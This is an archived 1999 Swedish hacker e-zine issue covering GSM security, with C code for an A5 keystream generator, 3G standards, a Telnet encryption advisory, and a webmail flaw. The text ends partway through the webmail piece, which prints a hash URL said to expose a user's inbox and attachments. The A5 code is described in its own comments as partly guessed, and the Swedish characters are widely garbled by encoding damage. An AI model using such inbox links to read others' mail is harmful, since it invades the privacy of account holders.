textfiles/magazines/SWEDISH/outlaw-08.txt

1456 lines
53 KiB
Plaintext
Raw Normal View History

2021-04-15 13:31:59 -05:00
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Heretics Inc. presenterar....
[ Outlaw Informativa ]
issue 8, 99-10-09
___________________
O U T L A W 8
Oktober 9, 1999
___________________
- A Heretics Inc. Production -
"Det <20>r den som g<>r vilse som finner de nya v<>garna"
- Niels Kjear
Var h<>lsad till nummer 8 av Outlaw Informativa. Detta nummer kommer f<>rhoppn-
ingsvis att inneh<65>lla nyttig och intressant information. Som ni kommer m<>rkt
s<> har Outlaw Informativa bytt fr<66>n seri<72>s stil till oseri<72>s, jag har f<>tt
m<>nga olika <20>sikter kring detta fenomen. En del tycker att det <20>r kul med
lite humor d<>r emellan vissa tycker raka motsatsen. Jag vet inte <20>n hur jag
ska l<>sa detta, men f<>r att hj<68>lpa oss kan du enkelt skicka ett email till
keytrace@usa.net och s<>ga vad du tycker. Jag har g<>tt i funderingar p<>
att g<>ra Outlaw Informativa till ett mer seri<72>st zine vilket <20>det avg<76>r att
Carding och Anarchy delarna tas bort, vad ni tycker om det kan ni genaste
skicka ett mail till mig. F<>r <20>vrigt kommer detta nummer inneh<65>lla lite
blandat information kring Telefon system, S<>kerhet och <20>ven lite funderingar
och enkla unders<72>knaringar av olika system som ofta f<>ljer med en massa fr<66>-
getecken som <20>r meningen att ni ska maila in till keytrace@usa.net och svara
p<>.
-----------------------------------------------------------------------------
Disclaimer
-----------------------------------------------------------------------------
Andv<64>nder du materialet i detta elektroniska tidning i olagligt syfte och
<20>ker fast f<>r det s<> f<>r du st<73> f<>r det. Du tar sj<73>lv ansvar f<>r dina egna
handlingar.
-----------------------------------------------------------------------------
Medverkande
-----------------------------------------------------------------------------
En enkel lista med folk som skrivit f<>r detta nummer och hur du kan komma i
kontakt med personen.
Alias: diox1de Contact: keytrace@usa.net
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Alias: ncode Contact: root@sectech.org
<20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Alias: p01nt_zer0 Contact: po1nt_zero@hotmail.com
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
-----------------------------------------------------------------------------
I N N E H <20> L L S F <20> T E C K N I N G
$ Staff
1:1. Editor
1:2. Disclaimer
1:3. Medverkande
1:4. Inneh<65>llsf<73>rteckning
1:5. Aktuellt
1.6. Heretics Manifesto
$ Nyheter
2.1. Microsoft kritiserar Linux
2.2. Sun sl<73>pper k<>llkoden f<>r Solaris fri
$ Phreaking och Telefoni
3:1. S<>kerhet i GSM systemet, del #3 av: diox1de
3:2. IMT-2000/FPLMTS av: p01nt_zer0
3:3. UMTS av: p01nt_zer0
$ Hacking, S<>kerhet, Unix etc.
4:1. Paket kryptering i Telnet av: diox1de
4:2. M<>jlig bakd<6B>rr i marijuana.com av: diox1de
4:3. Funderingar kring Telia av: diox1de
4:4. Skapa ett SUID Shell av: ncode
4:5. Enkelt om 2 olika Trojaner av: diox1de
4:6. Brev ang<6E>ende telias r<>tt om spr<70>rning av: anonymous
4:7. Linux f<>r dumma, del #1 av: diox1de
$ Ins<6E>ndare
5:1. Netscape 4.05 (Messenger) kryptering
$ N<>gra ord innan slutet
6:1 . Copyright
6:2 . return 0;
N<>r du befinner dig p<> <20>ppet territorium, st<73>r ingen. Om n<>gon st<73>r dig,
be honom sluta. Slutar han inte, g<>r slut p<> honom.
-----------------------------------------------------------------------------
Aktuellt
-----------------------------------------------------------------------------
<20> Heretics hemsida flyttad
Heretics Inc. 's hemsida flyttades fr<66>n kontot till www.g1mp.net/heretics,
och det har jag ncode att tacka f<>r, tack
<20> Prenumerations listan l<>ggs ner !
Prenumerations listan l<>ggs ner, eftersom alla prenumerationer f<>rsvann i en
h<>rdisk krash, och n<>r jag checkade min mail dit alla prenumerationer skickas
s<> l<>g d<>r 200 stycken, jag har inte andv<64>ndt mig av n<>got program som
hanterar prenumerationen.
<20> p01nt_zer0 skriver lite texter, kommer eventuellt joina
p01nt_zer0 har mycket kunskap kring Phreaking/Telefoni och han kommer m<>jlig-
tvis joina Heretics, <20>n s<> l<>nge verkar det som han lyckats, eftersom inform-
ationen som kommer bla. i detta nummer inte finns i n<>got annat zine..allts<74>
inte s<> v<>lskrivet om :)
<20> Kunskapsplan resulterar i texter och artiklar
Jag diox1de har lagt upp n<>got som jag kallar f<>r en kunskapslan. Jag har
lagt upp typ ett schema vad jag ska l<>sa och praktisera om, nu h<>ller jag p<>
att studera Unix n<>sta kommer bli Windows NT, sen C programmering osv.
Detta kommer resultera att jag skriver textfiler/artiklar, men dessa kommer
bara vara skrivna f<>r min egen skull, f<>r att jag ska l<>ra mig b<>ttre.
<20> Kommande Projekt
En tutorial om Kryptering
Kryptering <20>r ett hett <20>mne just nu, p<>grund av att mycket har b<>rjat
sk<73>tas via Internet, typ internet handel och dyl. Detta <20>r s<> pass nytt
s<> s<>kerheten ligger bakom fr<66>getecknet. D<>rf<72>r hade jag t<>nkt att skriva
en tutorial om Kryptering som programmerare, systemansvariga och s<>kerhets
intresserade kommer ha nytta av.Jag kommer skriva om hur kryptering fungerar
vid kommunikation <20>ver k<>nsliga kanalen, hur assymetriska och symmetriska
chiffer fungerar,lite enkelt om historia och angrepp mot de olika teknikerna
vid kryptering.
F<>r att texten jag har b<>rjat p<> ska h<>lla h<>g klass och nneh<65>lla r<>tt
information s<> beh<65>ver jag <20>sikter, tips osv. om texten, visserligen har jag
inte kommit speciellt l<>ngt p<> den, ligger p<> ca. 30k just nu. Men du som
vet att du <20>r hyffsat seri<72>s och kan en del kring kryptering och har m<>jlig-
heter att hj<68>lpa till s<> maila diox1de@hacksweden.com.
Praktik och Teori sv<73>vande kring PPP och Modem
Detta <20>r ett eventuellt projekt som jag kanske ska b<>rja med. Jag har l<>st
Rasslade lite i mitt text arkiv och hittade ett par textfiler om PPP protok-
ollet och om Modem kommunikation,j ag l<>ste igenom information och blev dir-
ekt intresserad. S<> nu h<>ller jag p<> med en tutorial som jag kommer
kalla: Praktik och Teori sv<73>vande kring PPP och Modem. Den kommer inneh<65>lla
information hur Modem fungerar, hur du kodar fj<66>rranslutnings script,
Teoretisk f<>rklaring av PPP protokollet samt hur du s<>tter upp en PPP
anslutning i Linux. Om du vill hj<68>lpa till och ge tips, f<>rslag eller skicka
information sv<73>vande kring <20>mnet jag kommer skriva om s<> st<73>r min mail addr-
ess nedan.
- diox1de@hacksweden.com
NTFS whitepaper
Detta <20>r ett eventuellt projekt som jag kanske ska b<>rja med. Jag har l<>st
lite sm<73>tt om NTFS (Network File System) och blivit mycket intresserad. Om
du vill att det ska bli n<>t s<> skicka s<> mycket information om NTFS du kan
till diox1de@hacksweden.com. F<>rst och fr<66>mst ska jag <20>gna mig <20>t texten om
kryptering och Outlaw Informativa. Men n<>r texten om kryptering b<>rjar ta
sig i form och bli klar s<> kommer jag antagligen b<>rja ordenkligt med texten
om NTFS. Det <20>r bara en tidfr<66>ga tills det ligger NTFS whitepaper ligger
p<> Heretics projekt arkiv.
-----------------------------------------------------------------------------
Heretics Manifesto
-----------------------------------------------------------------------------
Vi f<>rst<73>r att du vill l<>ra dig, men f<>r att l<>ra dig beh<65>ver du styrka som
kommer f<>lja dig tills du n<>r dina m<>l. Styrkan kommer hj<68>lpa dig att f<>rst<73>,
att hantera fel. Under tiden du l<>r dig m<>ste du hela tiden h<>lla tanken i
bakhuvudet; <20>verskatta dig inte sj<73>lv, var sj<73>lvs<76>ker men d<>lj det f<>r andra.
Om det <20>r n<>gon som ber om hj<68>lp, bli d<> uppm<70>rksamm och f<>rs<72>k att hj<68>lpa
personen s<> mycket du kan. Akta dig noga f<>r den m<>rka sidan byggt p<> elitis-
m, k<>nner du stor ondska <20>ver en person f<>rs<72>k h<>lla kommentarerna till dig
sj<73>lv och bevara dom d<>r eller argumentera p<> ett bra s<>tt med personen.
The Dark Side is closer than you think.
-----------------------------------------------------------------------------
Microsoft kritiserar Linux
-----------------------------------------------------------------------------
Som ni kanske vet s<> <20>r det m<>nga som byter fr<66>n Microsofts operativsystem
till Linux, det har <20>ven sj<73>lv gjort. Detta leder ju ocks<6B> till att MS
f<>rlorar en j<>vla massa pengar. Microsoft <20>r/har blivit oroliga och os<6F>kra.
P<> en websida, n<>rmare best<73>mt:
http://www.microsoft.com/ntserver/nts/news/msnw/LinuxMyths.asp
MS p<>st<73>r att att Linux <20>r ett ostabilt os<6F>kert system j<>mnf<6E>rt med WinNT.
Jag har sj<73>lv studerat en del h<>l i Linux och i NT och g<>mnf<6E>rt dem, resulta-
tet <20>r ju d<> att Windows NT <20>r s<> grymt mycket ostabilare <20>n vad Linux <20>r. MS
tar till alla medel f<>r att skr<6B>mma Linux andv<64>ndarna och sno tillbaka sina
kunder. Seri<72>st s<> tror jag att dom inte har lyckats n<>got vidare.
K<>lla: http://linux.idg.se
-----------------------------------------------------------------------------
Sun sl<73>pper k<>llkoden f<>r Solaris fri
-----------------------------------------------------------------------------
Sun Microsystems sl<73>pper k<>llkoden f<>r sitt os Solaris helt fri. Villkoret <20>r
dock att programmerarna inte f<>r utveckla sina egna l<>sningar.
Dom sl<73>ppte den fri f<>r att bla. administrat<61>rer ska kunna bygga ett kluster
eller s<>tta upp en webbserver, d<> v<>ljer dom ist<73>llet Linux framf<6D>r Solaris.
Det kommer <20>ven bli stor konkuranns n<>r Microsoft sl<73>pper sitt nya os
Windows 2000.
-----------------------------------------------------------------------------
S<>kerhet i GSM systemet, del #3
-----------------------------------------------------------------------------
[F<>rord]
<20>nnu en del om GSM S<>kerhet, ligger nu uppe i #3 delen och kommer bli den
sista, men jag kommer dock f<>rl<72>nga den h<>r artikeln lite. Den kommer allts<74>
bli en aning st<73>rre en de andra delarna.
[<5B>versikt]
F<>r er som inte l<>st alla #3 serierna om GSM S<>kerhet s<> t<>nkte jag g<> igenom
vad alla handlar om.
.---------------------------------------------------------------------------.
|DEL #1: Handlar om hur Subscriber Identity Authentication fungerar och |
| lite annat sm<73>tt och gott som dyker upp d<>r emellan. |
| |
|DEL #2: Handlar om Krypterings-algoritmen A5, hur den fungerar teoretiskt |
| s<>tt. |
| |
|DEL #3: Handlar om hur "User and Signalling Data Confidentiality" fungerar |
| och lite om A5 igen som andv<64>nds i det ovan + Subscriber Identity |
| Confidentiality . |
`---------------------------------------------------------------------------<2D>
[User and Signalling Data Confidentiality]
User and Signalling Data Confidentiality har tre element att ta hand om och
dessa <20>r:
<20> user data confidentiality
<20> signalling information on physical connections
<20> connectionless user data confidentiality and signalling information
element confidentiality.
--> "user data confidentiality"
Tar hand om privacy f<>r andv<64>ndaren som genererat all data, b<>de r<>ster
och data som kommer fr<66>n mobilen. Allts<74> som skickas <20>ver radio och trafik
kanalerna.
--> "signalling information" som seglar runt p<> fysiska anslutningar
Signal Informationen (Signalling Information) har ocks<6B> med privacy att
g<>ra. Tar hand om andv<64>ndar information som skickas i form av ett paket
av information som g<>r via radio l<>nken p<> signal kanalen. Detta
transporteras hit och dit p<> de fysiska anslutningarna (physical connecti-
ons)
--> "connectionless user data confidentiality" och "signalling information
element confidentiality".
Det tredje elementet f<>rser f<>r enskildheter av en "certain user" som <20>r
besl<73>ktad med andra signal element som g<>r via radio l<>nken p<> signal
kanalen.
F<>r att det ska bli s<>kert i <20>verf<72>ring av alla de tre elmenten s<> beh<65>vs
sj<73>lvklart kryptering, h<>r andv<64>nds A5 som <20>r beskriven i del #2. F<>r att det
ska funka att andv<64>nda A5 algoritm s<> m<>ste alla n<>tverk och mobiler ha st<73>d
f<>r det, annars blir det en hel del problem. Jag t<>nke beskriva algoritm
A5 lite enkelt f<>r att uppdaterera era kunskaper, men fr<66>mst mina.
A5 <20>r en algortim f<>r att kryptera trafik. F<>rst skapar den en keystream
under kontroll av en en nyckel. Bit f<>r Bit av keystreamen transporteras <20>ver
Radio L<>nken mellan Basstationen och MS:en. Nyckeln blir etablerad p<> MS:en
som en liten del av authenication proceduren. Informationen blir dekrypterad
efter MS:en har blivit identifierad. Mer orkar jag inte ber<65>tta p<>grund av
bakfylla, tr<74>tthet osv. Men A5 <20>r ju f<>rklarad i #7:an s<> ni kan ju l<>sa d<>r
ocks<6B>.
Note: MS = Mobile Subscriber, mobiltelefon med andra ord.
[Subscriber Identity Confidentiality]
<20>r en slags funktion eller applikation som g<>r det m<>jligt f<>r en andv<64>ndare
att uppdatera sin "location etc." utan att avsl<73>ja sitt "International Mobile
Subscriber Identity (IMSI) f<>r n<>gon som g<>r ett f<>rs<72>k till ett angrepp
p<> radio l<>nken. Med andra ord hindrar den allts<74> att n<>gon sniffar signal
v<>xlingen p<> radio l<>nken f<>r att s<>ka upp en best<73>md mobitelefonens befintl-
iga "location". Alla mobil n<>t och mobiltelefoner m<>ste i regel kunna st<73>dja
denna tj<74>nst, det <20>r iofs inte helt obligatoriskt.
Det <20>r absolut n<>dv<64>ndigt att IMSI inte skickas i cleartext p<> Radio l<>nken,
visserligen finns det fall d<>r det inte g<>r det och d<> dyker m<>nga effektiva
angrepp upp som kan g<>ra att en person kan s niffa Radio l<>nken. Mekanism i
mobilen ska vara f<>rsedd med denna funktion och den ska <20>ven vara baserad p<>
temporary mobile subscriber identity (TMSI) som oskyldigt men mycket s<>kert
uppdateras efter varje lyckad tillg<6C>ng (Successful Access :P) till systemet.
I princip s<> beh<65>ver inte TMSI vara krypterad n<>r den <20>verf<72>rs p<> Radio L<>nk-
en. Som n<>mnt tidigare s<> beh<65>ver d<>remot IMSI vara krypterad eftersom
effektiva angrepp kan uppst<73>.
Hur fungerar det d<>?...Jo, detta f<>ruts<74>tter att MS <20>r tilldelat med en TMSI,
betecknas bet<65>cknas som TMSIo, och att n<>tverket har etablerat en f<>rening
mellan TMSIo och en sk. "Mobile Subscriber" allts<74> typ en abbonent eller helt
enkelt en mobiltelefon. MS identifierar sig med N<>tverket (authenticerar).
Direkt efter authenticationen <20>r genomf<6D>rd (om den nu blir det :-/) N<>tverket
generar ett nytt TMSI, bet<65>cknas d<> som TMSIn, och skickar sedan det till MS
och skickas d<> i krypterad form (Krypterat med nyckeln Kc) MS dekrypterar
och ers<72>tter TMSIo med TMSIn.
[Ett exempel p<> A5]
H<>r kommer k<>llkoden f<>r ett exempel av A5 algoritmen. Du kan f<>rs<72>ka hitta
p<> n<>got kul med den eller n<>t.
/*
* In writing this program, I've had to guess a few pices of information:
*
* 1. Which bits of the key are loaded into which bits of the shift register
* 2. Which order the frame sequence number is shifted into the SR (MSB
* first or LSB first)
* 3. The position of the feedback taps on R2 and R3 (R1 is known).
* 4. The position of the clock control taps. These are on the
* `middle' one,
* I've assumed to be 9 on R1, 11 on R2, 11 on R3.
*/
/*
* Look at the `middle' stage of each of the 3 shift registers.
* Either 0, 1, 2 or 3 of these 3 taps will be set high.
* If 0 or 1 or one of them are high, return true. This will cause each of
* the middle taps to be inverted before being used as a clock control. In
* all cases either 2 or 3 of the clock enable lines will be active. Thus,
* at least two shift registers change on every clock-tick and the system
* never becomes stuck.
*/
static int threshold(r1, r2, r3)
unsigned int r1;
unsigned int r2;
unsigned int r3;
{
int total;
total = (((r1 >> 9) & 0x1) == 1) +
(((r2 >> 11) & 0x1) == 1) +
(((r3 >> 11) & 0x1) == 1);
if (total > 1)
return (0);
else
return (1);
}
unsigned long clock_r1(ctl, r1)
int ctl;
unsigned long r1;
{
unsigned long feedback;
/*
* Primitive polynomial x**19 + x**5 + x**2 + x + 1
*/
ctl ^= ((r1 >> 9) & 0x1);
if (ctl)
{
feedback = (r1 >> 18) ^ (r1 >> 17) ^ (r1 >> 16) ^ (r1 >> 13);
r1 = (r1 << 1) & 0x7ffff;
if (feedback & 0x01)
r1 ^= 0x01;
}
return (r1);
}
unsigned long clock_r2(ctl, r2)
int ctl;
unsigned long r2;
{
unsigned long feedback;
/*
* Primitive polynomial x**22 + x**9 + x**5 + x + 1
*/
ctl ^= ((r2 >> 11) & 0x1);
if (ctl)
{
feedback = (r2 >> 21) ^ (r2 >> 20) ^ (r2 >> 16) ^ (r2 >> 12);
r2 = (r2 << 1) & 0x3fffff;
if (feedback & 0x01)
r2 ^= 0x01;
}
return (r2);
}
unsigned long clock_r3(ctl, r3)
int ctl;
unsigned long r3;
{
unsigned long feedback;
/*
* Primitive polynomial x**23 + x**5 + x**4 + x + 1
*/
ctl ^= ((r3 >> 11) & 0x1);
if (ctl)
{
feedback = (r3 >> 22) ^ (r3 >> 21) ^ (r3 >> 18) ^ (r3 >> 17);
r3 = (r3 << 1) & 0x7fffff;
if (feedback & 0x01)
r3 ^= 0x01;
}
return (r3);
}
int keystream(key, frame, alice, bob)
unsigned char *key; /* 64 bit session key */
unsigned long frame; /* 22 bit frame sequence number */
unsigned char *alice; /* 114 bit Alice to Bob key stream */
unsigned char *bob; /* 114 bit Bob to Alice key stream */
{
unsigned long r1; /* 19 bit shift register */
unsigned long r2; /* 22 bit shift register */
unsigned long r3; /* 23 bit shift register */
int i; /* counter for loops */
int clock_ctl; /* xored with clock enable on each shift register */
unsigned char *ptr; /* current position in keystream */
unsigned char byte; /* byte of keystream being assembled */
unsigned int bits; /* number of bits of keystream in byte */
unsigned int bit; /* bit output from keystream generator */
/* Initialise shift registers from session key */
r1 = (key[0] | (key[1] << 8) | (key[2] << 16) ) & 0x7ffff;
r2 = ((key[2] >> 3) | (key[3] << 5) | (key[4] << 13) |
(key[5] << 21)) & 0x3fffff;
r3 = ((key[5] >> 1) | (key[6] << 7) | (key[7] << 15) ) & 0x7fffff;
/* Merge frame sequence number into shift register state, by xor'ing it
* into the feedback path
*/
for (i=0;i<22;i++)
{
clock_ctl = threshold(r1, r2, r2);
r1 = clock_r1(clock_ctl, r1);
r2 = clock_r2(clock_ctl, r2);
r3 = clock_r3(clock_ctl, r3);
if (frame & 1)
{
r1 ^= 1;
r2 ^= 1;
r3 ^= 1;
}
frame = frame >> 1;
}
/* Run shift registers for 100 clock ticks to allow frame number to
* be diffused into all the bits of the shift registers
*/
for (i=0;i<100;i++)
{
clock_ctl = threshold(r1, r2, r2);
r1 = clock_r1(clock_ctl, r1);
r2 = clock_r2(clock_ctl, r2);
r3 = clock_r3(clock_ctl, r3);
}
/* Produce 114 bits of Alice->Bob key stream */
ptr = alice;
bits = 0;
byte = 0;
for (i=0;i<114;i++)
{
clock_ctl = threshold(r1, r2, r2);
r1 = clock_r1(clock_ctl, r1);
r2 = clock_r2(clock_ctl, r2);
r3 = clock_r3(clock_ctl, r3);
bit = ((r1 >> 18) ^ (r2 >> 21) ^ (r3 >> 22)) & 0x01;
byte = (byte << 1) | bit;
bits++;
if (bits == 8)
{
*ptr = byte;
ptr++;
bits = 0;
byte = 0;
}
}
if (bits)
*ptr = byte;
/* Run shift registers for another 100 bits to hide relationship between
* Alice->Bob key stream and Bob->Alice key stream.
*/
for (i=0;i<100;i++)
{
clock_ctl = threshold(r1, r2, r2);
r1 = clock_r1(clock_ctl, r1);
r2 = clock_r2(clock_ctl, r2);
r3 = clock_r3(clock_ctl, r3);
}
/* Produce 114 bits of Bob->Alice key stream */
ptr = bob;
bits = 0;
byte = 0;
for (i=0;i<114;i++)
{
clock_ctl = threshold(r1, r2, r2);
r1 = clock_r1(clock_ctl, r1);
r2 = clock_r2(clock_ctl, r2);
r3 = clock_r3(clock_ctl, r3);
bit = ((r1 >> 18) ^ (r2 >> 21) ^ (r3 >> 22)) & 0x01;
byte = (byte << 1) | bit;
bits++;
if (bits == 8)
{
*ptr = byte;
ptr++;
bits = 0;
byte = 0;
}
}
if (bits)
*ptr = byte;
return (0);
}
[F<>rkortningar, sammanfattning]
LSFR : Linear Feedback Shift Register
MS : Mobile Subscriber dvs. Mobil Telefon
TMSI : temporary mobile subscriber identity
IMSI : International Mobile Subscriber Identity
AUC : Authentication Center
HLR : Home Location Register
VLR : Visitor Location Register
hehe, som sagt: Ingen publicerings kvalitet.
[K<>llf<6C>rteckning]
Eftersom det h<>r va sista delen s<> t<>nke jag skriva k<>llf<6C>rtecking, allts<74>
var jag f<>tt tag i all info.
Overview of GSM Security Features (LoU)
Att f<>rst<73> Telekommunikaion (Telia & Ericsson)
Usenet (sci.crypt)
[Efterord]
Nu va det slut p<> serien "S<>kerhet i GSM systemet", om du skulle l<>sa <20>ven
dokumentationen som <20>r tecknad i avdelningen "K<>llf<6C>rteckning" kan du l<>tt
uppleva som att jag <20>terber<65>ttar och <20>vers<72>tter informationen. Det <20>r delvis
sant, att jag skrev denna serie med artiklar va f<>r min egen skull eftersom
jag har studerat GSM S<>kerhet ett tag, dock ingen direkt f<>rdjupning i <20>mnet.
Om ni tyckte att serierna var nyttiga och bra s<> <20>r det ju bara ett bonus.
Jag vet att de inte h<>ll n<>gon publicerings kvalitet. Men jag sl<73>ppte dem
end<6E>. F<>r<EFBFBD>vrigt har jag dragit slutsatsen om att GSM N<>tet h<>ller f<>rh<72>lland-
evis mycket h<>g S<>kerhet som inte direkt vem som helst skulle kunna g<>ra ett
effektivt angrepp mot. Gl<47>m inte bort att artiklarna <20>r baserade p<> en studie
i GSM S<>kerhet.
-----------------------------------------------------------------------------
IMT-2000/FPLMTS
-----------------------------------------------------------------------------
FPLMTS - Future Public Land Mobile Telecommunication System har bytt namn
till IMT-2000 - International Mobile Telecommunication 2000. F<>rutom FPLMTS
ing<6E>r <20>ven GMPCS - Global Mobile Personal Communications.
Utvecklingen av IMT-2000 drivs av ITU-R och m<>let <20>r kommunikation n<>r och
var som helst. Det <20>r viktigt att det ska kunna utnyttjas med hj<68>lp av en
liten kommunikationsenhet man l<>tt kan b<>ra med sig, t.ex. en mobiltelefon.
IMT-2000 omfattar flera olika radiomilj<6C>er, som b<>rjar med sm<73> milj<6C>er
inomhus, d<>r man skall erbjuda h<>g kapacitet, detta forts<74>tter vidare via
lokala och regionala milj<6C>er till en global milj<6C> d<>r man med hj<68>lp av
satelliter t<>cker in hela jorden.
Man kommer allts<74> att anv<6E>nda olika tekniker inom omr<6D>den, samtidigt som
dessa tekniker ska kunna samverka och bilda en enhet, j<>mf<6D>r med GSM/DECT
d<>r det finns telefoner som kan arbeta inom b<>da milj<6C>erna.
De frekvenser som ska anv<6E>ndas har angivits till 1.885-2.225 och 1.980-
2.200 MHz, varav 1.980-2.010 och 2.170-2.200 skall anv<6E>ndas f<>r satelitkommu-
nikation. Frekvenserna har angivits av WARC - World Administrative Radio
Conferance.
IMT-2000/FPLMTS och UMTS <20>r tredje generationens mobiltelefonisystem, andra
generationens GSM, D-AMPS och PDC <20>r det vi anv<6E>nder idag och f<>rsta
generationen, som fortfarande <20>r i bruk NMT, AMPS och TACS. Ett av de viktig-
aste m<>len f<>r IMT-2000 <20>r att utforma en global standard, s<> att samma
system kan anv<6E>ndas <20>ver hela v<>rlden.
F<>ljande standarder har utformats av ITU-R f<>r att beskriva IMT-2000:
Standard: Inneh<65>ll:
M.816 Framework for services supported by FPLMTS.
M.817 Network architectures for FPLMTS.
M.818 Satellite operation whitin FPLMTS.
M.819 Adaption of FPLMTS to the needs of developing countries.
M.1034 Requirements for the radio interface(s) for FPLMTS.
M.1035 Framework for the radio interface(s) and radio subsystem
functionality for FPLMTS.
M.1036 Spectrum consideations for implementation of FPLMTS in the
bands 1885-2025 MHz and 2110 MHz.
M.1078 Security principles for FPLMTS.
M.1079 Spech and voiceband data performance requirements for FPLMTS.
(Tabellen <20>r inte <20>versatt p<>grund av att det <20>r l<>ttare att f<>rst<73>
vad som menas om det <20>r p<> engelska om det skulle dyka upp i andra
texter n<>r du studerar)
IMT-2000/FPLMTS kommer att erbjuda ett brett utbud av tj<74>nster, baserat p<> de
tj<74>nster s<>v<EFBFBD>l fasta som mobila telen<65>t kan erbjuda.
Tj<54>nsterna omfattar persons<6E>kning, digitala datatj<74>nster och audio/video.
Tj<54>nster som kr<6B>ver h<>g bandbredd/kapacitet kommer i f<>rsta hand att erbjudas
i t<>tbefolkade omr<6D>den.
Oavsett var i v<>rlden man befinner sig, kommer man minst att ha tillg<6C>ng till
ett grundutbud av tj<74>nster.
Knowledge is a treashre but...
practice is the main key to to it.
-----------------------------------------------------------------------------
UMTS
-----------------------------------------------------------------------------
UMTS <20>r ett europiskt initiativ som drivs av ETSI, f<>r att skapa en gemensam
internationell standard f<>r alla former av mobiltelekommunication, inklusive
mobiltelefoni.
UMTS <20>r en europisk variant an IMT-2000 - International Mobile Tele-
communication 2000 som drivs av ITU. (jag g<>tt igenom det i en tidigare text)
De generella m<>len f<>r UMTS <20>r:
Kapacitet:
Att kunna erbjuda upp till 2 Mbps kapacitet f<>r olika tj<74>nster, med
reservation f<>r de fysiska f<>ruts<74>ttningarna som den aktuella
f<>rbindelsen erbjuder.
Kvalitet:
Erbjuda en kvalitet p<> kommunikation som l<>gst uppfyller de krav som
g<>ller f<>r fasta f<>rbindelser.
Funktioner, tj<74>nster:
Kunna tillhandah<61>lla ett brett spektra av tj<74>nster anpassade f<>r olika
anv<6E>ndare.
St<53>da UPT (Universal Personal Telecommunications).
Att st<73>da "wideband" intergration med B-ISDN via ATM.
Det ska vara dynamiskt s<> att det <20>r l<>tt att l<>gga till nya tj<74>nster
och funktioner.
Det ska kunna allokera bandbredd dynamiskt och vid behov (on demand).
Kompatibilitet, standarder:
Det ska st<73>mma <20>ver<65>ns med ITUs IMT-2000 rekommendationer.
Det ska kunna anpassas f<>r alla tj<74>nster och all utrustning som i fram-
tiden kommer att kunna anv<6E>ndas i fasta n<>t.
Det ska finnas st<73>d f<>r b<>de <20>ppna och slutna standarder.
Kompatibilitet f<>r intelligenta tj<74>nster i b<>de fasta och mobila n<>tverk.
Kunna f<>rena de m<>nga mobiltelefonisystem som finns idag, samtidigt som
valfrihet ska kunna erbjudas.
Det ska kunna fungera internationellt (iaf i Europa), inom olika typer
av milj<6C>er och terr<72>ng.
Det ska kunna st<73>da avreglering och konlurrens inom alla typer av milj<6C>er
och applikationer.
Dela resurserna i radiobandet mellan olika operat<61>rer, b<>de publika och
privata.
Dela resurserna i radiobandet mellan ett standardiserat grundutbud av
tj<74>nster och ett mer dynmiskt utbud som baseras p<> marknadens behov.
Det <20>r allts<74> ganska m<>nga krav som skall uppfyllas, men vissa av dem <20>r
redan l<>sta, t.ex. med hj<68>lp av GSM.
N<>tverk och radiol<6F>nk
UMTS utformas f<>r att anv<6E>nda Intelligenta N<>tverk (IN) och erbjuda de
tj<74>nster som d<> blir m<>jliga, de komponenter som kommer att ing<6E> <20>r t.ex.
SCPer. Detta g<>r att man l<>tt kan <20>stakomma anv<6E>ndaranpassade tj<74>nster och
att man kan <20>ndra tj<74>nsterna i grundutbudet.
UMTS ska ing<6E> i IBCN - Intergrated Broadband Communications Network som en
enhet f<>r mobil access mot B-ISDN. Detta inneb<65>r att mobila n<>t kommer att
kunna erbjuda tj<74>nster som tidigare endast fasta n<>t kunnat erbjuda.
Knowledge is a treashre but...
practice is the main key to to it.
-----------------------------------------------------------------------------
Paket kryptering i Telnet
-----------------------------------------------------------------------------
Jag t<>nkte ta upp ett h<>l i Berkelys Telnet klienter som st<73>djer "Telnet enc-
ryption Option" som andv<64>nder Kerberos V4 authentication.
[ok, till sj<73>lva problemet]
Vem som helst kan f<> tillg<6C>ng till de krypterade paketen och enkelt dekrypte-
ra. Man kan enkelt sniffa paketen f<>r att f<> tag i dem.
[L<>sning]
Den vanliga l<>sningen <20>r att ladda ner uppgraderingar, som jag listar nedan..
Source code f<>r en patch: net-dist.mit.edu:/pub/telnet/telnet.patch
Uppgraderingar:
ftp.ncsa.uiuc.edu/Mac/Telnet/Telnet2.6/prerelease/d7/Telnet2.6.1d7(68K).sit.hqx
/Mac/Telnet/Telnet2.6/prerelease/d7/Telnet2.6.1d7(fat).sit.hqx
Plugins f<>r Kerberos:
ftp.ncsa.uiuc.edu/Mac/Telnet/Telnet2.6/prerelease/AuthMan.plugin.1.0b1.hqx
/Mac/Telnet/Telnet2.6/prerelease/Kerberos_Telnet_plugin.sit.hqx
K<>lla: CERT
-----------------------------------------------------------------------------
M<>jlig bakd<6B>rr i marijuana.com
-----------------------------------------------------------------------------
Jag <20>r lite os<6F>ker p<> detta men jag f<>rklarar det jag uppt<70>ckte s<> skickar ni
information som jag inte vet till mig p<> keytrace@usa.net
http://mail.marijuana.com/mail/check_mail/user/c8116dca1e48dd76379f7582197293fa
c8116dca1e48dd76379f7582197293fa
Summan <20>r samma varje g<>ng n<>gon loggar
in varje andv<64>ndare har sin egen summa
vilket tyder p<> att det <20>r ett krypter-
at l<>senord.
Om jag nu loggar in p<> min egna inbox p<> marijuana.com och kopierar url:en
till inboxen s<> kan denna person l<>sa alla min brev jag f<>tt plus kolla p<>
filer som folk skickat till mig.
Det jag testade var att ge url:en till en polare p<> IRC och bad honom kolla
om han fick n<>gon access till dem.
http://mail.marijuana.com/mail/check_mail/user/c8116dca1e48dd76379f7582197293fa
<20>r url:en till inboxen.
http://mail.marijuana.com/mail/attachment/user/c8116dca1e48dd76379f7582197293fa/pic.jpg?msg=6&part=8
